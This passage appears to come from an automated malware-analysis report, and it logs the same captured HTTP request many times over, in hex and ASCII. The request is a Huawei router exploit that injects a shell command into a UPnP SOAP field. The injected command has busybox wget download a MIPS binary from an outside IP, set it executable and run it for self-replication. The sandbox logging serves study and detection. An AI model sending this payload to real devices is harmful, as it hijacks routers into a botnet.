2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 